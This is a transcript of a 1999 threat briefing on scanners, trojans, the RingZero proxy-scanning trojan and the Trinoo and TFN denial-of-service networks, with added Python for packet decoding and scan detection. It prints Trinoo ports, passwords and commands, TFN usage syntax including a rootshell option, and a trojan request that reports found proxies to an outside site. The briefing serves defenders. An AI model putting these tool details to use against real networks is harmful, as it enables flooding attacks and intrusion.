
Internet Threat Brief


dunnjamie

Presentation Transcript


  1. Internet Threat Brief Bad things that happen to good organizations!

  2. Tools that may be visiting your organization • Jackal • Queso • Nmap • Hping • Trojans • DDOS

  3. Enter the Jackal 1997

  Opening comments from Jackal.c:

  /* Jackal - Stealth/FireWall scanner. With the use of half open ports and sending SYNC (sometimes additional flags like FIN) one can scan behind a firewall. It shouldn’t let the site feel we're scanning by not doing a 3-way-handshake; we hope to avoid any tcp-logging. Credits: Halflife, Jeff (Phiji) Fay, Abdullah Marafie. Alpha Tester: Walter Kopecky. Results: Some firewalls did allow SYN | FIN to pass through. No Site has been able to log the connections though.. during alpha testing. ShadowS shadows@kuwait.net Copyleft (hack it; i really don’t care). */

  4. Sons of Jackal continue to be seen: Source Port 0 and 65535
  12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512
  16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512
  13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512
  SF: SYN = Synchronize or Start; FIN = Finish or Stop

  5. Queso and friends http://www.apostols.org/projectz/queso/ Queso sends packets with unexpected code bit combinations to determine the operating system of the remote computer. Currently, they claim to be able to distinguish over 100 OSes and OS states. The Queso pattern is shown on the notes page.

  6. Hping (Jan 98) Designed to port scan hosts indirectly: packets are “bounced off” the host the attacker is framing. Hping is interesting because it can both spoof its source and collect information on the target; this had not been accomplished before.

  7. Nmap The next generation of the tools that came before it integrates all their capabilities in a single tool: • Stealth scanning • Stack analysis, TCP fingerprinting • Sequence number prediction • Decoy

  8. Trojans This is Roland’s home computer, connected to an ISP

  9. Trojans “Driving the Bus”, NETBUS

  10. W97M.Marker.a • Word 97 Virus • HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info • What does it do? • FTP’s what appear to be “worm tracks”, a list of the previous systems it has infected • Could potentially be a valuable recon tool for developing chains of potential infection

  11. PCs ship with fast modems as standard equipment (diagram: Internet - ISP - Firewall) The more restrictive a site’s firewall policy, the more likely the employees will use modems.

  12. Finding Unprotected Shares: Legion 2.1 http://rhino9.ml.org

  13. Trojans Review • The most well known trojan programs are Netbus and Back Orifice • Protective tools include: all major anti-virus tools, Nuke Nabber, NFR’s Back Officer Friendly, and AtGuard

  14. The Next “Threat Wave” • The security community is doing a better job of securing networks. • Firewalls, IDSs, Encryption • Doesn’t it make sense that future threats will bypass these countermeasures from the inside?

  15. An Example Deep Throat Trace
  200.31.13.8 > 158.12.110.1.2140: udp 2
  4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01 ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c
  200.31.13.8 > 158.12.110.2.2140: udp 2
  4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02 ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231
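The hex dumps above can be decoded by hand, but a small parser makes the header fields explicit. The following Python is an added example, not code from the slides: it decodes the first packet's IPv4 and UDP headers (the slide's "coa8" is read as the hex digit pair c0a8) and recomputes the IP header checksum. The checksum does not verify against the address bytes in the hex, but it does verify against the addresses printed in the tcpdump line (200.31.13.8 to 158.12.110.1), which tells an analyst that the address bytes in the dump were altered before publication while the checksum was left as captured.

```python
import struct

# Hex dump of the first Deep Throat packet from the slide. Only the first
# 30 bytes (the IP total length) are the datagram; the rest is link-layer padding.
SLIDE_HEX = (
    "4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01 "
    "ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c"
)


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over an IPv4 header (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_ipv4_udp(hexdump: str) -> dict:
    """Decode an IPv4 header and, for protocol 17, the UDP header and payload."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    ver_ihl, _tos, total_len, ident, _frag, ttl, proto, cksum = struct.unpack(
        "!BBHHHBBH", raw[:12]
    )
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(raw) < total_len:
        raise ValueError("not a complete IPv4 datagram")
    header = raw[:ihl]
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    pkt = {
        "src": ".".join(str(b) for b in raw[12:16]),
        "dst": ".".join(str(b) for b in raw[16:20]),
        "ttl": ttl,
        "proto": proto,
        "ip_id": ident,
        "total_length": total_len,
        "checksum_stated": cksum,
        "checksum_computed": ip_checksum(zeroed),
    }
    pkt["checksum_ok"] = pkt["checksum_stated"] == pkt["checksum_computed"]
    if proto == 17:  # UDP: source port, destination port, length, checksum
        sport, dport, ulen, _ucksum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
        pkt.update(sport=sport, dport=dport, udp_length=ulen,
                   payload=raw[ihl + 8:ihl + ulen])
    return pkt


def checksum_with_addresses(hexdump: str, src: str, dst: str) -> int:
    """Recompute the dump's IP checksum with substituted addresses, to test
    whether a pair of printed addresses belongs to these header bytes."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    ihl = (raw[0] & 0x0F) * 4
    header = bytearray(raw[:ihl])
    header[10:12] = b"\x00\x00"
    header[12:16] = bytes(int(o) for o in src.split("."))
    header[16:20] = bytes(int(o) for o in dst.split("."))
    return ip_checksum(bytes(header))


if __name__ == "__main__":
    for key, value in decode_ipv4_udp(SLIDE_HEX).items():
        print(f"{key}: {value}")
    print("checksum with tcpdump-line addresses: 0x%04x"
          % checksum_with_addresses(SLIDE_HEX, "200.31.13.8", "158.12.110.1"))
```

Running it shows UDP 60000 to 2140 (the Deep Throat port on the slide) carrying the two-byte payload "00", a TTL of 113, and a stated checksum of 0x8795 against a computed 0x8104 for the bytes as printed.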

  16. The Story of RingZero • Indications and Warnings • This is BIG! • What is it? • What are “they” up to? • Decoding RingZero

  17. Getting A Clue • Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem • We both commented that probes to tcp port 3128 are not that common

  18. Indications and Warnings • Sept 21, 1999 - NSWC SHADOW analyst Adena Bushrod reports activity • Army ARL, Mitre, and others are seeing “Proxy Scans” too! Example:
  08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
  08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
  08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
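Both scan patterns the brief has shown so far, the SYN|FIN packets from source port 0 or 65535 on slide 4 and the 80/8080/3128 triplet above, can be picked out of tcpdump output with a few lines of Python. The following is an added example, not code from the brief: the sample lines are constructed from the two slides plus one ordinary web connection that should produce no finding, and the only line format it accepts is the tcpdump TCP summary shown on the slides (timestamp, src.port > dst.port: flags).

```python
import re
from collections import defaultdict

# Constructed sample: the lines from slides 4 and 18 plus one normal connection.
SAMPLE = """\
12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512
16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512
13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
09:01:02 client.example.1025 > 192.168.2.1.80: S 5:5(0) win 8192
"""

# tcpdump TCP summary line as printed on the slides:
#   HH:MM:SS src.sport > dst.dport: FLAGS ...
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d) (?P<src>\S+)\.(?P<sport>\d+) > "
    r"(?P<dst>\S+)\.(?P<dport>\d+): (?P<flags>[SFRPAU.]+)"
)

PROXY_PORTS = {80, 8080, 3128}   # the "proxy scan" triplet seen by the community
RESERVED_SRC_PORTS = {0, 65535}  # a normal TCP stack never picks these


def parse_tcpdump(text):
    """Yield one dict per parseable line; lines in other formats are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["sport"] = int(pkt["sport"])
            pkt["dport"] = int(pkt["dport"])
            yield pkt


def detect(text):
    """Return (source, reason) findings for the scan patterns on the slides."""
    findings = []
    ports_by_src = defaultdict(set)
    for pkt in parse_tcpdump(text):
        flags = set(pkt["flags"])
        if {"S", "F"} <= flags:
            findings.append((pkt["src"], "SYN and FIN set together (Jackal-style stealth scan)"))
        if pkt["sport"] in RESERVED_SRC_PORTS:
            findings.append((pkt["src"], "reserved source port %d" % pkt["sport"]))
        ports_by_src[pkt["src"]].add(pkt["dport"])
    # The triplet only shows up when the per-source destination ports are collected.
    for src, ports in sorted(ports_by_src.items()):
        if PROXY_PORTS <= ports:
            findings.append((src, "80/8080/3128 proxy-scan triplet (RingZero pattern)"))
    return findings


if __name__ == "__main__":
    for src, reason in detect(SAMPLE):
        print(f"{src}: {reason}")
```

The SYN|FIN and reserved-port checks fire per packet; the triplet check has to aggregate per source across the whole capture, which is why a single-packet signature engine of the period would miss it.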

  19. SANS Community Validation “ Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!” This is BIG!

  20. Over 300 Port 3128 Messages In Three Days
  29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
  30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
  31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
  32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
  33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
  34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
  35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
  36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
  37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48;
  38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
  39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
  40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;
  Over 1000 Source Hosts!

  21. What Could It Be? • Given: • More than 1000 live sources • Apparently random destinations • What Could It Be? • Spoofed • World’s largest coordinated attack • Trojan software or “malware”

  22. Spoofed Attack? No! “I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IPs and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter.” Judy Novak - ARL

  23. The First Hot Tip - Sept 23 “We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:” Anonymous get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=80

  24. So What? “Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.” Anonymous

  25. Game Over? “I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.” Ron Marcum, Vanderbilt

  26. Birds Of A Feather • Extreme BoF! • Crowded room • High temperatures • Long hours 7 hours of fun! (7PM-2AM)

  27. Russian Server? Or Not? • The rusftpsearch.net site • contained Russian language text • is a German based company • is hosted by virtualave.net in Seattle, WA • is administered by “Black Harmer” • Black Harmer uses mail.ru for free email • Some of Harmer’s code published on fido7.pvt.virii • The data seems to indicate a “Russian interest”

  28. Latest News • SMTP to Finland • Upon the successful download of two its.dat files, its.exe attempts to connect to tcp port 25 (smtp) of rokol.ramk.fi • Spamming ICQ Users • Spoofs source as www.mircosoft.com • Spams XXXXX@pager.mirabilis.com

  29. Review of Findings • ITS.EXE attempts to • retrieve its.dat from various servers • connect to tcp port 25 of rokol.ramk.fi • Spam random ICQ users with the message “Biggest Proxy List!” and the rusftpsearch URL • PST.EXE is the active scanner • doesn’t require the its.dat file to run • discovered proxies send their IPs to www.rusftpsearch.net

  30. Questions Still Remain • Infection mechanism? • Thought to be an email attachment • What is the its.dat file for? • Targeting • Scan intensity dial • Attack configuration

  31. Implications? “Quantum leap in distributed attack technology” • Viral infection rates • Configurable - its.dat • scanning -> attacking? • Automatic result consolidation • Hacker community notification

  32. Threat Advisory Distributed IW Tools By John Green

  33. Force Multiplication (diagram): Hacker -> Handlers H1..HN -> Agents A1..AN -> Targets T; the handlers and agents are themselves victims

  34. Trinoo Network • Distributed UDP Flood DoS Attack Tool • Client / Server Architecture • A trinoo network of 227 systems was used against an Internet2 site, causing a DoS which lasted for two days.

  35. Trinoo Signatures (diagram)
  Hacker -> Handler (H1): TCP port 27665, password “betaalmostdone”
  Agents (A1..AN) -> Handler: UDP port 31335, “*HELLO*”
  Handler -> Agents: UDP port 27444, password “l44adsl”
  Agents -> Target (T): UDP, random ports

  36. Trinoo Supported Commands
  Handler: die, quit, mtimer, dos, mdie, mping, mdos, info, msize, nslookup, killdead, usebackup, bcast, help, mstop
  Agent: aaa (start UDP DoS), bbb (DoS timelimit), shi (phone home), png (report in), d1e (shut down), rsz N (resize packet), xyz (multiple DoS)

  37. Tribal Flood Network • Distributed ICMP/TCP/UDP Flood DoS • Client / Server Architecture • Similar to Trinoo, but much more stealthy • uses covert channels for handler-agent communications

  38. TFN Signatures (diagram)
  Hacker -> Handler (H1): any backdoor access method
  Handler <-> Agents (A1..AN): ICMP Echo Reply; commands are sent as 16 bit integers in the ID field of the IP header
  Agents -> Target (T): TCP/UDP/ICMP flood

  39. TFN Supported Commands
  • Usage: ./tfn <iplist> <type> [ip] [port]
  • <iplist> - list of agent hosts
  • <type> - -1 spoofmask, -2 packetsize, 0 stop/status, 1 udp, 2 syn, 3 icmp, 4 bind to a rootshell, 5 smurf
  • [ip] - targetlist separated by @
  • [port] - necessary for syn flood, 0 = random

  40. Implications - Upstream DoS

  41. So what does it mean? • 1997 • Stealth, resist logging • Penetration, evade SYN matching • 1998 • TCP Fingerprinting - stack analysis • Coordinated attacks

  42. So what does it mean? • 1999 • Database analysis capability • Continued work on distributed scanners • Decoys, decoys, decoys • Advanced scans for trojans

  43. Houston, we have a problem • Technological surprise • Decoys are going to really screw with low end intrusion detection systems and untrained analysts • CIRTs are going to need raw data from detects

  44. What am I doing • High end proxy firewalls • Checking log files, intrusion detection • Personal firewalls (TCP Wrappers, Nuke Nabber, NFR Officer Friendly, At Guard) • Encrypting more of my files, moving to 2048 bit encryption
